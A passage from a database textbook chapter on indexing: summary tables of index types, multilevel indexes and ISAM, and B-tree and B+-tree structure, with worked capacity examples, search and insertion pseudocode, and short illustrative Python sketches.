used. This technique is illustrated in Figure 5. Retrieval via the index requires one or more additional block accesses because of the extra level, but the algorithms for searching the index and (more importantly) for inserting new records in the data file are straightforward (a sketch of this indirection scheme follows Figure 5 below). In addition, retrievals on complex selection conditions may be handled by referring to the record pointers, without having to retrieve many unnecessary records from the data file (see Exercise 23).

[Figure 5: A secondary index (with record pointers) on a nonkey field, implemented using one level of indirection so that index entries are of fixed length and have unique field values. Each index entry points to a block of record pointers, and each record pointer in that block points to a data file record with the corresponding indexing field value.]

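
As promised above, here is a minimal Python sketch of option 3, the extra level of indirection for a nonkey secondary index. The record ids, field values, and function names are hypothetical stand-ins for record pointers and disk blocks, not details from the text.

```python
# Hypothetical sketch of option 3: a nonkey secondary index on Dept_number.
# Each index entry <K(i), P(i)> points to a "block" of record pointers; every
# record pointer in that block refers to a record whose field value equals K(i).

records = {  # record id -> (Name, Dept_number); ids stand in for record pointers
    101: ("Smith", 5), 102: ("Wong", 5), 103: ("Zelaya", 4),
    104: ("Wallace", 4), 105: ("Narayan", 5), 106: ("English", 1),
}

# Build the index: one fixed-length entry per distinct Dept_number value,
# pointing to a block of record pointers.
pointer_blocks = {}
for rid, (_, dept) in records.items():
    pointer_blocks.setdefault(dept, []).append(rid)
index = sorted(pointer_blocks.items())          # [(K(i), pointer block), ...]

def retrieve(dept):
    """Follow the single index entry for dept to its block of record pointers."""
    for value, block in index:                  # a real system would binary-search
        if value == dept:
            return [records[rid] for rid in block]
    return []

print(retrieve(5))   # all records with Dept_number = 5
```

The index itself stays nondense (one entry per distinct value), while the pointer blocks absorb the variable number of records per value.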


Notice that a secondary index provides a logical ordering on the records by the
indexing field. If we access the records in order of the entries in the secondary index,
we get them in order of the indexing field. The primary and clustering indexes
assume that the field used for physical ordering of records in the file is the same as
the indexing field.

1.4 Summary
To conclude this section, we summarize the discussion of index types in two tables.
Table 1 shows the index field characteristics of each type of ordered single-level
index discussed—primary, clustering, and secondary. Table 2 summarizes the prop-
erties of each type of index by comparing the number of index entries and specify-
ing which indexes are dense and which use block anchors of the data file.

Table 1 Types of Indexes Based on the Properties of the Indexing Field

                              Index Field Used for             Index Field Not Used for
                              Physical Ordering of the File    Physical Ordering of the File
  Indexing field is key       Primary index                    Secondary index (key)
  Indexing field is nonkey    Clustering index                 Secondary index (nonkey)

Table 2 Properties of Index Types

  Type of Index         Number of (First-level)              Dense or Nondense    Block Anchoring
                        Index Entries                        (Sparse)             on the Data File
  Primary               Number of blocks in data file        Nondense             Yes
  Clustering            Number of distinct index             Nondense             Yes/no (a)
                        field values
  Secondary (key)       Number of records in data file       Dense                No
  Secondary (nonkey)    Number of records (b) or number      Dense or Nondense    No
                        of distinct index field values (c)

  (a) Yes if every distinct value of the ordering field starts a new block; no otherwise.
  (b) For option 1.
  (c) For options 2 and 3.


2 Multilevel Indexes
The indexing schemes we have described thus far involve an ordered index file. A
binary search is applied to the index to locate pointers to a disk block or to a record
(or records) in the file having a specific index field value. A binary search requires
approximately (log2bi) block accesses for an index with bi blocks because each step
of the algorithm reduces the part of the index file that we continue to search by a
factor of 2. This is why we take the log function to the base 2. The idea behind a
multilevel index is to reduce the part of the index that we continue to search by bfri,
the blocking factor for the index, which is larger than 2. Hence, the search space is
reduced much faster. The value bfri is called the fan-out of the multilevel index, and
we will refer to it by the symbol fo. Whereas we divide the record search space into
two halves at each step during a binary search, we divide it n-ways (where n = the
fan-out) at each search step using the multilevel index. Searching a multilevel index
requires approximately (logfobi) block accesses, which is a substantially smaller
number than for a binary search if the fan-out is larger than 2. In most cases, the
fan-out is much larger than 2.

A multilevel index considers the index file, which we will now refer to as the first (or
base) level of a multilevel index, as an ordered file with a distinct value for each K(i).
Therefore, by considering the first-level index file as a sorted data file, we can create
a primary index for the first level; this index to the first level is called the second
level of the multilevel index. Because the second level is a primary index, we can use
block anchors so that the second level has one entry for each block of the first level.
The blocking factor bfri for the second level—and for all subsequent levels—is the
same as that for the first-level index because all index entries are the same size; each
has one field value and one block address. If the first level has r1 entries, and the
blocking factor—which is also the fan-out—for the index is bfri = fo, then the first
level needs ⎡(r1/fo)⎤ blocks, which is therefore the number of entries r2 needed at the
second level of the index.

We can repeat this process for the second level. The third level, which is a primary
index for the second level, has an entry for each second-level block, so the number
of third-level entries is r3 = ⎡(r2/fo)⎤. Notice that we require a second level only if the
first level needs more than one block of disk storage, and, similarly, we require a
third level only if the second level needs more than one block. We can repeat the
preceding process until all the entries of some index level t fit in a single block. This
block at the tth level is called the top index level.4 Each level reduces the number of
entries at the previous level by a factor of fo—the index fan-out—so we can use the
formula 1 ≤ (r1/(fo)^t) to calculate t. Hence, a multilevel index with r1 first-level entries will have approximately t levels, where t = ⎡logfo(r1)⎤. When searching the index, a single disk block is retrieved at each level. Hence, t disk blocks are accessed for an index search, where t is the number of index levels.

Footnote 4: The numbering scheme for index levels used here is the reverse of the way levels are commonly defined for tree data structures. In tree data structures, t is referred to as level 0 (zero), t – 1 is level 1, and so on.

The multilevel scheme described here can be used on any type of index—whether it
is primary, clustering, or secondary—as long as the first-level index has distinct val-
ues for K(i) and fixed-length entries. Figure 6 shows a multilevel index built over a
primary index. Example 3 illustrates the improvement in number of blocks accessed
when a multilevel index is used to search for a record.

Example 3. Suppose that the dense secondary index of Example 2 is converted into
a multilevel index. We calculated the index blocking factor bfri = 68 index entries
per block, which is also the fan-out fo for the multilevel index; the number of first-
level blocks b1 = 442 blocks was also calculated. The number of second-level blocks
will be b2 = ⎡(b1/fo)⎤ = ⎡(442/68)⎤ = 7 blocks, and the number of third-level blocks
will be b3 = ⎡(b2/fo)⎤ = ⎡(7/68)⎤ = 1 block. Hence, the third level is the top level of
the index, and t = 3. To access a record by searching the multilevel index, we must
access one block at each level plus one block from the data file, so we need t + 1 = 3
+ 1 = 4 block accesses. Compare this to Example 2, where 10 block accesses were
needed when a single-level index and binary search were used.
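
The level counts in Example 3 come from repeatedly dividing by the fan-out until a level fits in one block. Here is a minimal Python sketch of that calculation, using the Example 2 figures (fo = 68, 442 first-level blocks); the function name is an illustrative assumption.

```python
import math

def multilevel_levels(first_level_blocks, fan_out):
    """Return the number of index levels t and the block count at each level,
    dividing by the fan-out until a level fits in a single (top) block."""
    blocks_per_level = [first_level_blocks]
    while blocks_per_level[-1] > 1:
        blocks_per_level.append(math.ceil(blocks_per_level[-1] / fan_out))
    return len(blocks_per_level), blocks_per_level

t, per_level = multilevel_levels(first_level_blocks=442, fan_out=68)
print(t, per_level)                          # 3 levels: [442, 7, 1]
print("block accesses per lookup:", t + 1)   # one block per level + one data block = 4
```

This reproduces the t = 3 levels and the 4 total block accesses of Example 3.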

Notice that we could also have a multilevel primary index, which would be non-
dense. Exercise 18(c) illustrates this case, where we must access the data block from
the file before we can determine whether the record being searched for is in the file.
For a dense index, this can be determined by accessing the first index level (without
having to access a data block), since there is an index entry for every record in the
file.

A common file organization used in business data processing is an ordered file with
a multilevel primary index on its ordering key field. Such an organization is called
an indexed sequential file and was used in a large number of early IBM systems.
IBM’s ISAM organization incorporates a two-level index that is closely related to
the organization of the disk in terms of cylinders and tracks. The first level is a cylin-
der index, which has the key value of an anchor record for each cylinder of a disk
pack occupied by the file and a pointer to the track index for the cylinder. The track
index has the key value of an anchor record for each track in the cylinder and a
pointer to the track. The track can then be searched sequentially for the desired
record or block. Insertion is handled by some form of overflow file that is merged
periodically with the data file. The index is recreated during file reorganization.

Algorithm 1 outlines the search procedure for a record in a data file that uses a non-
dense multilevel primary index with t levels. We refer to entry i at level j of the index
as <Kj(i), Pj(i)>, and we search for a record whose primary key value is K. We
assume that any overflow records are ignored. If the record is in the file, there must
be some entry at level 1 with K1(i) ≤ K < K1(i + 1) and the record will be in the block of the data file whose address is P1(i). Exercise 23 discusses modifying the search algorithm for other types of indexes.

[Figure 6: A two-level primary index resembling ISAM (Indexed Sequential Access Method) organization. The second (top) level indexes the first (base) level, which in turn indexes the blocks of the data file on its primary key field.]

Algorithm 1. Searching a Nondense Multilevel Primary Index with t Levels
(* We assume the index entry to be a block anchor that is the first key per block. *)
p ← address of top-level block of index;
for j ← t step –1 to 1 do
begin
    read the index block (at jth index level) whose address is p;
    search block p for entry i such that Kj(i) ≤ K < Kj(i + 1)
        (* if Kj(i) is the last entry in the block, it is sufficient to satisfy Kj(i) ≤ K *);
    p ← Pj(i) (* picks appropriate pointer at jth index level *)
end;
read the data file block whose address is p;
search block p for record with key = K;

As we have seen, a multilevel index reduces the number of blocks accessed when searching for a record, given its indexing field value. We are still faced with the problems of dealing with index insertions and deletions, because all index levels are physically ordered files. To retain the benefits of using multilevel indexing while reducing index insertion and deletion problems, designers adopted a multilevel index called a dynamic multilevel index that leaves some space in each of its blocks for inserting new entries and uses appropriate insertion/deletion algorithms for creating and deleting new index blocks when the data file grows and shrinks. It is often implemented by using data structures called B-trees and B+-trees, which we describe in the next section.

3 Dynamic Multilevel Indexes Using B-Trees and B+-Trees
B-trees and B+-trees are special cases of the well-known search data structure known as a tree. We briefly introduce the terminology used in discussing tree data structures. A tree is formed of nodes. Each node in the tree, except for a special node called the root, has one parent node and zero or more child nodes. The root node has no parent. A node that does not have any child nodes is called a leaf node; a nonleaf node is called an internal node. The level of a node is always one more than the level of its parent, with the level of the root node being zero.5 A subtree of a node consists of that node and all its descendant nodes—its child nodes, the child nodes of its child nodes, and so on. A precise recursive definition of a subtree is that it consists of a node n and the subtrees of all the child nodes of n.

Figure 7 illustrates a tree data structure. In this figure the root node is A, and its child nodes are B, C, and D. Nodes E, J, C, G, H, and K are leaf nodes. Since the leaf nodes are at different levels of the tree, this tree is called unbalanced.

Footnote 5: This standard definition of the level of a tree node, which we use throughout Section 3, is different from the one we gave for multilevel indexes in Section 2.

[Figure 7: A tree data structure that shows an unbalanced tree. The root A (level 0) has children B, C, and D; the leaf nodes E, J, C, G, H, and K lie at levels 1, 2, and 3.]
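
As a companion to Algorithm 1 above, here is a minimal runnable Python sketch of the same search. The index levels and the data file are simulated as in-memory lists of "blocks"; the block layout, variable names, and sample keys are hypothetical illustrations, not from the text.

```python
import bisect

# Each "block" is a list of (key, pointer) entries. Pointers at level 1 refer to
# data block numbers; pointers at level 2 (the top level) refer to level-1 blocks.
data_blocks = [  # data file: blocks physically ordered on the primary key
    [(2, "rec2"), (5, "rec5"), (8, "rec8")],
    [(12, "rec12"), (15, "rec15"), (21, "rec21")],
    [(24, "rec24"), (29, "rec29"), (35, "rec35")],
    [(36, "rec36"), (39, "rec39"), (41, "rec41")],
]
level1 = [[(2, 0), (12, 1)], [(24, 2), (36, 3)]]   # one block-anchor entry per data block
level2 = [[(2, 0), (24, 1)]]                       # top level: one entry per level-1 block
index_levels = {1: level1, 2: level2}
t = 2                                              # number of index levels

def search(K):
    """Follow Algorithm 1: one block access per index level, then one data block."""
    p = 0                                        # address of the top-level block
    for j in range(t, 0, -1):
        block = index_levels[j][p]               # read the index block at level j
        keys = [k for k, _ in block]
        i = bisect.bisect_right(keys, K) - 1     # entry i with Kj(i) <= K < Kj(i+1)
        if i < 0:
            return None                          # K is smaller than every key in the file
        p = block[i][1]                          # follow pointer Pj(i)
    for key, rec in data_blocks[p]:              # read the data block and scan it
        if key == K:
            return rec
    return None

print(search(29))   # -> 'rec29'
print(search(30))   # -> None (not in the file)
```

Exactly t index blocks plus one data block are touched per lookup, matching the t + 1 block accesses discussed above.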
In Section 3.1, we introduce search trees and then discuss B-trees, which can be used as dynamic multilevel indexes to guide the search for records in a data file. B-tree nodes are kept between 50 and 100 percent full, and pointers to the data blocks are stored in both internal nodes and leaf nodes of the B-tree structure. In Section 3.2 we discuss B+-trees, a variation of B-trees in which pointers to the data blocks of a file are stored only in leaf nodes, which can lead to fewer levels and higher-capacity indexes. In the DBMSs prevalent in the market today, the common structure used for indexing is the B+-tree.

3.1 Search Trees and B-Trees
A search tree is a special type of tree that is used to guide the search for a record, given the value of one of the record's fields. The multilevel indexes discussed in Section 2 can be thought of as a variation of a search tree; each node in the multilevel index can have as many as fo pointers and fo key values, where fo is the index fan-out. The index field values in each node guide us to the next node, until we reach the data file block that contains the required records. By following a pointer, we restrict our search at each level to a subtree of the search tree and ignore all nodes not in this subtree.

Search Trees. A search tree is slightly different from a multilevel index. A search tree of order p is a tree such that each node contains at most p − 1 search values and p pointers in the order <P1, K1, P2, K2, ..., Pq−1, Kq−1, Pq>, where q ≤ p. Each Pi is a
pointer to a child node (or a NULL pointer), and each Ki is a search value from some ordered set of values. All search values are assumed to be unique.6 Figure 8 illustrates a node in a search tree. Two constraints must hold at all times on the search tree:

1. Within each node, K1 < K2 < ... < Kq−1.
2. For all values X in the subtree pointed at by Pi, we have Ki−1 < X < Ki for 1 < i < q; X < Ki for i = 1; and Ki−1 < X for i = q (see Figure 8).

Whenever we search for a value X, we follow the appropriate pointer Pi according to the formulas in condition 2 above. Figure 9 illustrates a search tree of order p = 3 and integer search values. Notice that some of the pointers Pi in a node may be NULL pointers.

Footnote 6: This restriction can be relaxed. If the index is on a nonkey field, duplicate search values may exist and the node structure and the navigation rules for the tree may be modified.

[Figure 8: A node in a search tree with pointers to subtrees below it. The node holds <P1, K1, ..., Kq−1, Pq>; all values X in the subtree pointed at by Pi satisfy Ki−1 < X < Ki.]

[Figure 9: A search tree of order p = 3 with integer search values; some tree pointers are NULL.]

We can use a search tree as a mechanism to search for records stored in a disk file. The values in the tree can be the values of one of the fields of the file, called the search field (which is the same as the index field if a multilevel index guides the search). Each key value in the tree is associated with a pointer to the record in the data file having that value. Alternatively, the pointer could be to the disk block containing that record. The search tree itself can be stored on disk by assigning each tree node to a disk block. When a new record is inserted in the file, we must update the search tree by inserting an entry in the tree containing the search field value of the new record and a pointer to the new record.

Algorithms are necessary for inserting and deleting search values into and from the search tree while maintaining the preceding two constraints. In general, these algorithms do not guarantee that a search tree is balanced, meaning that all of its leaf nodes are at the same level.7 The tree in Figure 7 is not balanced because it has leaf nodes at levels 1, 2, and 3. The goals for balancing a search tree are as follows:

■ To guarantee that nodes are evenly distributed, so that the depth of the tree is minimized for the given set of keys and the tree does not get skewed, with some nodes at very deep levels.
■ To make the search speed uniform, so that the average time to find any random key is roughly the same.

While minimizing the number of levels in the tree is one goal, another implicit goal is to make sure that the index tree does not need too much restructuring as records are inserted into and deleted from the main file. Thus we want the nodes to be as full as possible, and we do not want any nodes to be empty if there are too many deletions. Record deletion may leave some nodes in the tree nearly empty, thus wasting storage space and increasing the number of levels. The B-tree addresses both of these problems by specifying additional constraints on the search tree.

B-Trees. The B-tree has additional constraints that ensure that the tree is always balanced and that the space wasted by deletion, if any, never becomes excessive. The algorithms for insertion and deletion, though, become more complex in order to maintain these constraints.
Nonetheless, most insertions and deletions are simple processes; they become complicated only under special circumstances—namely, whenever we attempt an insertion into a node that is already full or a deletion from a node that makes it less than half full. More formally, a B-tree of order p, when used as an access structure on a key field to search for records in a data file, can be defined as follows:

1. Each internal node in the B-tree (Figure 10(a)) is of the form
   <P1, <K1, Pr1>, P2, <K2, Pr2>, ..., <Kq−1, Prq−1>, Pq>
   where q ≤ p. Each Pi is a tree pointer—a pointer to another node in the B-tree. Each Pri is a data pointer8—a pointer to the record whose search key field value is equal to Ki (or to the data file block containing that record).
2. Within each node, K1 < K2 < ... < Kq−1.
3. For all search key field values X in the subtree pointed at by Pi (the ith subtree, see Figure 10(a)), we have: Ki−1 < X < Ki for 1 < i < q; X < Ki for i = 1; and Ki−1 < X for i = q.
4. Each node has at most p tree pointers.
5. Each node, except the root and leaf nodes, has at least ⎡(p/2)⎤ tree pointers. The root node has at least two tree pointers unless it is the only node in the tree.
6. A node with q tree pointers, q ≤ p, has q − 1 search key field values (and hence has q − 1 data pointers).
7. All leaf nodes are at the same level. Leaf nodes have the same structure as internal nodes except that all of their tree pointers Pi are NULL.

Footnote 7: The definition of balanced is different for binary trees. Balanced binary trees are known as AVL trees.
Footnote 8: A data pointer is either a block address or a record address; the latter is essentially a block address and a record offset within the block.

[Figure 10: B-tree structures. (a) A node in a B-tree with q − 1 search values, alternating tree pointers Pi and <Ki, Pri> pairs. (b) A B-tree of order p = 3; the values were inserted in the order 8, 5, 1, 7, 3, 12, 9, 6.]

Figure 10(b) illustrates a B-tree of order p = 3. Notice that all search values K in the B-tree are unique because we assumed that the tree is used as an access structure on a key field. If we use a B-tree on a nonkey field, we must change the definition of the file pointers Pri to point to a block—or a cluster of blocks—that contains the pointers to the file records. This extra level of indirection is similar to option 3, discussed in Section 1.3, for secondary indexes.

A B-tree starts with a single root node (which is also a leaf node) at level 0 (zero). Once the root node is full with p − 1 search key values and we attempt to insert another entry in the tree, the root node splits into two nodes at level 1. Only the middle value is kept in the root node, and the rest of the values are split evenly between the other two nodes. When a nonroot node is full and a new entry is inserted into it, that node is split into two nodes at the same level, and the middle entry is moved to the parent node along with two pointers to the new split nodes. If the parent node is full, it is also split. Splitting can propagate all the way to the root node, creating a new level if the root is split. We do not discuss algorithms for B-trees in detail in this book,9 but we outline search and insertion procedures for B+-trees in the next section.

If deletion of a value causes a node to be less than half full, it is combined with its neighboring nodes, and this can also propagate all the way to the root. Hence, deletion can reduce the number of tree levels. It has been shown by analysis and simulation that, after numerous random insertions and deletions on a B-tree, the nodes are approximately 69 percent full when the number of values in the tree stabilizes. This is also true of B+-trees. If this happens, node splitting and combining will occur only rarely, so insertion and deletion become quite efficient. If the number of values grows, the tree will expand without a problem—although splitting of nodes may occur, so some insertions will take more time.
Each B-tree node can have at most p tree pointers, p − 1 data pointers, and p − 1 search key field values (see Figure 10(a)).

In general, a B-tree node may contain additional information needed by the algorithms that manipulate the tree, such as the number of entries q in the node and a pointer to the parent node. Next, we illustrate how to calculate the number of blocks and levels for a B-tree.

Example 4. Suppose that the search field is a nonordering key field, and we construct a B-tree on this field with p = 23. Assume that each node of the B-tree is 69 percent full. Each node, on the average, will have p * 0.69 = 23 * 0.69 or approximately 16 pointers and, hence, 15 search key field values. The average fan-out fo = 16. We can start at the root and see how many values and pointers can exist, on the average, at each subsequent level:

Root:     1 node       15 key entries      16 pointers
Level 1:  16 nodes     240 key entries     256 pointers
Level 2:  256 nodes    3840 key entries    4096 pointers
Level 3:  4096 nodes   61,440 key entries

At each level, we calculated the number of key entries by multiplying the total number of pointers at the previous level by 15, the average number of entries in each node. Hence, for the given block size, pointer size, and search key field size, a two-level B-tree holds 3840 + 240 + 15 = 4095 entries on the average; a three-level B-tree holds 65,535 entries on the average.

B-trees are sometimes used as primary file organizations. In this case, whole records are stored within the B-tree nodes rather than just the
entries. This works well for files with a relatively small number of records and a small record size. Otherwise, the fan-out and the number of levels become too great to permit efficient access.

9For details on insertion and deletion algorithms for B-trees, consult Ramakrishnan and Gehrke [2003].

In summary, B-trees provide a multilevel access structure that is a balanced tree
structure in which each node is at least half full. Each node in a B-tree of order p can
have at most p − 1 search values.
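
The arithmetic of Example 4 can be reproduced with a short program. The following Python sketch (ours, not part of the text) computes the approximate capacity of a B-tree given its order and an assumed average node occupancy; the function name btree_capacity and the 0.69 occupancy default are illustrative choices.

# Minimal sketch reproducing the arithmetic of Example 4:
# a B-tree of order p whose nodes are, on average, 69 percent full.
def btree_capacity(p, levels, occupancy=0.69):
    """Approximate number of key entries in a B-tree with the given
    number of levels below the root (root = level 0)."""
    fan_out = round(p * occupancy)          # average pointers per node
    keys_per_node = fan_out - 1             # one fewer key than pointers
    nodes, total_keys = 1, 0
    for _ in range(levels + 1):             # root plus `levels` lower levels
        total_keys += nodes * keys_per_node
        nodes *= fan_out                    # each pointer leads to one node
    return total_keys

print(btree_capacity(23, 2))   # two-level tree: 4095 entries
print(btree_capacity(23, 3))   # three-level tree: 65535 entries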

3.2 B+-Trees
Most implementations of a dynamic multilevel index use a variation of the B-tree
data structure called a B+-tree. In a B-tree, every value of the search field appears
once at some level in the tree, along with a data pointer. In a B+-tree, data pointers
are stored only at the leaf nodes of the tree; hence, the structure of leaf nodes differs
from the structure of internal nodes. The leaf nodes have an entry for every value of
the search field, along with a data pointer to the record (or to the block that contains
this record) if the search field is a key field. For a nonkey search field, the pointer
points to a block containing pointers to the data file records, creating an extra level
of indirection.

The leaf nodes of the B+-tree are usually linked to provide ordered access on the
search field to the records. These leaf nodes are similar to the first (base) level of an
index. Internal nodes of the B+-tree correspond to the other levels of a multilevel
index. Some search field values from the leaf nodes are repeated in the internal
nodes of the B+-tree to guide the search. The structure of the internal nodes of a B+-
tree of order p (Figure 11(a)) is as follows:

1. Each internal node is of the form

<P1, K1, P2, K2, ..., Pq−1, Kq−1, Pq>

where q ≤ p and each Pi is a tree pointer.
2. Within each internal node, K1 < K2 < ... < Kq−1.

3. For all search field values X in the subtree pointed at by Pi, we have Ki−1 < X ≤ Ki for 1 < i < q; X ≤ Ki for i = 1; and Ki−1 < X for i = q (see Figure 11(a)).10

4. Each internal node has at most p tree pointers.

5. Each internal node, except the root, has at least ⎡(p/2)⎤ tree pointers. The root node has at least two tree pointers if it is an internal node.

6. An internal node with q pointers, q ≤ p, has q − 1 search field values.

The structure of the leaf nodes of a B+-tree of order p (Figure 11(b)) is as follows:

1. Each leaf node is of the form

<<K1, Pr1>, <K2, Pr2>, ..., <Kq−1, Prq−1>, Pnext>

where q ≤ p, each Pri is a data pointer, and Pnext points to the next leaf node of
the B+-tree.

10Our definition follows Knuth (1998). One can define a B+-tree differently by exchanging the < and ≤ symbols (Ki−1 ≤ X < Ki; Kq−1 ≤ X), but the principles remain the same.

[Figure 11: The nodes of a B+-tree. (a) Internal node of a B+-tree with q − 1 search values. (b) Leaf node of a B+-tree with q − 1 search values and q − 1 data pointers.]

2. Within each leaf node, K1 ≤ K2 ≤ ... ≤ Kq−1, q ≤ p.

3. Each Pri is a data pointer that points to the record whose search field value is Ki or to a file block containing the record (or to a block of record pointers that point to records whose search field value is Ki if the search field is not a key).

4. Each leaf node has at least ⎡(p/2)⎤ values.

5. All leaf nodes are at the same level.

The pointers in internal nodes are tree pointers to blocks that are tree nodes, whereas the pointers in leaf nodes are data pointers to the data file records or blocks—except for the Pnext pointer, which is a tree pointer to the next leaf node. By starting at the leftmost leaf node, it is possible to traverse leaf nodes as a linked list, using the Pnext pointers. This provides ordered access to the data records on the indexing field. A Pprevious pointer can also be included. For a B+-tree on a nonkey field, an extra level of indirection is needed similar to the one shown in Figure 5, so the Pr pointers are block pointers to blocks that contain a set of record pointers to the actual records in the data file, as discussed in option 3 of Section 1.3.

Because entries in the internal nodes of a B+-tree include search values and tree pointers without any data pointers, more entries can be packed into an internal node of a B+-tree than for a similar B-tree. Thus, for the same block (node) size, the order p will be larger for the B+-tree than for the B-tree, as we illustrate in Example 5. This can lead to fewer B+-tree levels, improving search time. Because the structures for internal and for leaf nodes of a B+-tree are different, the order p can be different. We will use p to denote the order for internal nodes and pleaf to denote the order for leaf nodes, which we define as being the maximum number of data pointers in a leaf node.

Example 5. To calculate the order p of a B+-tree, suppose that the search key field is V = 9 bytes long, the block size is B = 512 bytes, a record pointer is Pr = 7 bytes, and a block pointer is P = 6 bytes. An internal node of the B+-tree can have up to p tree pointers and p − 1 search field values; these must fit into a single block. Hence, we have:

(p * P) + ((p − 1) * V) ≤ B
(p * 6) + ((p − 1) * 9) ≤ 512
(15 * p) ≤ 521

We can choose p to be the largest value satisfying the above inequality, which gives p = 34. This is larger than the value of 23 for the B-tree (it is left to the reader to compute the order of the B-tree assuming same size pointers), resulting in a larger fan-out and more entries in each internal node of a B+-tree than in the corresponding B-tree. The leaf nodes of the B+-tree will have the same number of values and pointers, except that the pointers are data pointers and a next pointer.
Hence, the order pleaf for the leaf nodes can be calculated as follows:

(pleaf * (Pr + V)) + P ≤ B
(pleaf * (7 + 9)) + 6 ≤ 512
(16 * pleaf) ≤ 506

It follows that each leaf node can hold up to pleaf = 31 key value/data pointer combinations, assuming that the data pointers are record pointers.

As with the B-tree, we may need additional information—to implement the insertion and deletion algorithms—in each node. This information can include the type of node (internal or leaf), the number of current entries q in the node, and pointers to the parent and sibling nodes. Hence, before we do the above calculations for p and pleaf, we should reduce the block size by the amount of space needed for all such information. The next example illustrates how we can calculate the number of entries in a B+-tree.

Example 6. Suppose that we construct a B+-tree on the field in Example 5. To calculate the approximate number of entries in the B+-tree, we assume that each node is 69 percent full. On the average, each internal node will have 34 * 0.69 or approximately 23 pointers, and hence 22 values. Each leaf node, on the average, will hold 0.69 * pleaf = 0.69 * 31 or approximately 21 data record pointers. A B+-tree will have the following average number of entries at each level:

Root:        1 node         22 key entries        23 pointers
Level 1:     23 nodes       506 key entries       529 pointers
Level 2:     529 nodes      11,638 key entries    12,167 pointers
Leaf level:  12,167 nodes   255,507 data record pointers

For the block size, pointer size, and search field size given above, a three-level B+-tree holds up to 255,507 record pointers, with the average 69 percent occupancy of nodes. Compare this to the 65,535 entries for the corresponding B-tree in Example 4. This is the main reason that B+-trees are preferred to B-trees as indexes to database files.

Search, Insertion, and Deletion with B+-Trees. Algorithm 2 outlines the procedure using the B+-tree as the access structure to search for a record. Algorithm 3 illustrates the procedure for inserting a record in a file with a B+-tree access structure. These algorithms assume the existence of a key search field, and they must be modified appropriately for the case of a B+-tree on a nonkey field. We illustrate insertion and deletion with an example.

Algorithm 2. Searching for a Record with Search Key Field Value K, Using a B+-tree

n ← block containing root node of B+-tree;
read block n;
while (n is not a leaf node of the B+-tree) do
begin
    q ← number of tree pointers in node n;
    if K ≤ n.K1 (*n.Ki refers to the ith search field value in node n*)
        then n ← n.P1 (*n.Pi refers to the ith tree pointer in node n*)
    else if K > n.Kq−1
        then n ← n.Pq
    else begin
        search node n for an entry i such that n.Ki−1 < K ≤ n.Ki;
        n ← n.Pi
    end;
    read block n
end;
search block n for entry (Ki, Pri) with K = Ki; (*search leaf node*)
if found
    then read data file block with address Pri and retrieve record
    else the record with search field value K is not in the data file;

Algorithm 3. Inserting a Record with Search Key Field Value K in a B+-tree of Order p

n ← block containing root node of B+-tree;
read block n;
set stack S to empty;
while (n is not a leaf node of the B+-tree) do
begin
    push address of n on stack S; (*stack S holds parent nodes that are needed in case of split*)
    q ← number of tree pointers in node n;
    if K ≤ n.K1 (*n.Ki refers to the ith search field value in node n*)
        then n ← n.P1 (*n.Pi refers to the ith tree pointer in node n*)
    else if K > n.Kq−1
        then n ← n.Pq
    else begin
        search node n for an entry i such that n.Ki−1 < K ≤ n.Ki;
        n ← n.Pi
    end;
    read block n
end;
search block n for entry (Ki, Pri) with K = Ki; (*search leaf node n*)
if found
    then record already in file; cannot insert
else (*insert entry in B+-tree to point to record*)
begin
    create entry (K, Pr) where Pr points to the new record;
    if leaf node n is not full
        then insert entry (K, Pr) in correct position in leaf node n
    else begin (*leaf node n is full with pleaf record pointers; is split*)
        copy n to temp (*temp is an oversize leaf node to hold extra entries*);
        insert entry (K, Pr) in temp in correct position;
        (*temp now holds pleaf + 1 entries of the form (Ki, Pri)*)
        new ← a new empty leaf node for the tree;
        new.Pnext ← n.Pnext;
        j ← ⎡(pleaf + 1)/2⎤;
        n ← first j entries in temp (up to entry (Kj, Prj));
        n.Pnext ← new;
        new ← remaining entries in temp;
        K ← Kj;
        (*now we must move (K, new) and insert in parent internal node;
          however, if parent is full, split may propagate*)
        finished ← false;
        repeat
            if stack S is empty
                then (*no parent node; new root node is created for the tree*)
                begin
                    root ← a new empty internal node for the tree;
                    root ← <n, K, new>;
                    finished ← true;
                end
            else begin
                n ← pop stack S;
                if internal node n is not full
                    then begin (*parent node not full; no split*)
                        insert (K, new) in correct position in internal node n;
                        finished ← true
                    end
                else begin (*internal node n is full with p tree pointers;
                             overflow condition; node is split*)
                    copy n to temp (*temp is an oversize internal node*);
                    insert (K, new) in temp in correct position;
                    (*temp now has p + 1 tree pointers*)
                    new ← a new empty internal node for the tree;
                    j ← ⎣(p + 1)/2⎦;
                    n ← entries up to tree pointer Pj in temp;
                    (*n contains <P1, K1, P2, K2, ..., Pj−1, Kj−1, Pj>*)
                    new ← entries from tree pointer Pj+1 in temp;
                    (*new contains <Pj+1, Kj+1, ..., Kp−1, Pp, Kp, Pp+1>*)
                    K ← Kj
                    (*now we must move (K, new) and insert in parent internal node*)
                end
            end
        until finished
    end;
end;
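
Both algorithms above operate on disk blocks. As a rough in-memory illustration of Algorithm 2 only (not the text's implementation), the following Python sketch represents nodes as plain objects, so "read block n" becomes following an object reference; the Node class and its field names are invented for the example.

# Minimal in-memory sketch of Algorithm 2 (B+-tree search).
# Internal nodes: keys = [K1..Kq-1], pointers = [P1..Pq] (child nodes).
# Leaf nodes: keys = [K1..Kq-1], pointers = [Pr1..Prq-1] (data pointers), plus p_next.
class Node:
    def __init__(self, keys, pointers, is_leaf=False, p_next=None):
        self.keys, self.pointers = keys, pointers
        self.is_leaf, self.p_next = is_leaf, p_next

def bplus_search(root, k):
    n = root                                   # "read block n"
    while not n.is_leaf:
        if k <= n.keys[0]:                     # K <= K1: follow P1
            n = n.pointers[0]
        elif k > n.keys[-1]:                   # K > Kq-1: follow Pq
            n = n.pointers[-1]
        else:                                  # find i with Ki-1 < K <= Ki
            i = next(j for j, key in enumerate(n.keys) if k <= key)
            n = n.pointers[i]
    for key, pr in zip(n.keys, n.pointers):    # search the leaf node
        if key == k:
            return pr                          # data pointer for the record
    return None                                # K is not in the data file

# Tiny example tree (keys 1, 3, 5, 7, 8 with dummy data pointers):
leaf2 = Node([7, 8], ["rec7", "rec8"], is_leaf=True)
leaf1 = Node([1, 3, 5], ["rec1", "rec3", "rec5"], is_leaf=True, p_next=leaf2)
root = Node([5], [leaf1, leaf2])
print(bplus_search(root, 7))   # -> "rec7"
print(bplus_search(root, 4))   # -> None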

Figure 12 illustrates insertion of records in a B+-tree of order p = 3 and pleaf = 2.
First, we observe that the root is the only node in the tree, so it is also a leaf node. As
soon as more than one level is created, the tree is divided into internal nodes and
leaf nodes. Notice that every key value must exist at the leaf level, because all data
